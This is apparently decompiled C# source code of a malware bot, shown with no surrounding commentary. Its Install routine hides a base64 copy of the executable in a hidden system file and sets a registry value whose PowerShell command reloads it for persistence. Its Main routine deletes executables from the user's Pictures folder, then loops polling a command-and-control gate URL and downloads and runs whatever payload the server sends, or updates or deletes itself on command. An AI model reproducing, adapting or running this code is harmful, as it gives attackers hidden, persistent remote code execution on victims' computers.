// Token: 0x06000009 RID: 9 RVA: 0x000023A4 File Offset: 0x000005A4
public static void Install()
{
string contents = Convert.ToBase64String(File.ReadAllBytes(Environment.GetCommandLineArgs()[0]));
File.AppendAllText(Constants.CODE_BASE, contents);
File.SetAttributes(Constants.CODE_BASE, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
UtilActions.MicroSleep();
Registry.CurrentUser.CreateSubKey("LANMedia2").SetValue("MPEG4Base", string.Format("([System.Reflection.Assembly]::Load([System.Convert]::FromBase64String([System.IO.File]::ReadAllText(\"{0}\")))).EntryPoint.Invoke($null,$null)", Constants.CODE_BASE));
}
// Token: 0x06000003 RID: 3 RVA: 0x0000213C File Offset: 0x0000033C
private static void Main()
{
UtilActions.MicroSleep();
SelfActions.StartUP();
UtilActions.RegularSleep();
if (File.Exists(Constants.CODE_BASE))
{
UtilActions.MicroSleep();
string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), "*.exe");
for (int i = 0; i < files.Length; i++)
{
string path = files[i];
try
{
File.SetAttributes(path, FileAttributes.Normal);
File.Delete(path);
}
catch
{
}
}
using (WebClient webClient = new WebClient())
{
while (true)
{
try
{
string text = webClient.DownloadString(Constants.GATE_URL + UtilActions.BuildQuery());
if (!(text == "D0AF5460E3FA6BE33399A12408D06917FD4DC81308E19AD4B2580BE040DC91954FD58A4242BEEE0B8ECB31097726FDA0DB93CBA325F939E6305A1767886614E7"))
{
if (!(text == "D000000F"))
{
if (!(text == "0E8AC9B2E716A0C3713AA6E34C02688BB4DDC0645483411710BFEDE69D15DAA49ACD44F067280C97E693E083D19008B5DE7968761A6083040349C0A785FF989F"))
{
SelfActions.ExecutePE(text);
}
else
{
SelfActions.Update();
}
}
}
else
{
SelfActions.Delete();
}
}
catch
{
}
UtilActions.RegularSleep();
}
}
}
UtilActions.MicroSleep();
SelfActions.Install();
}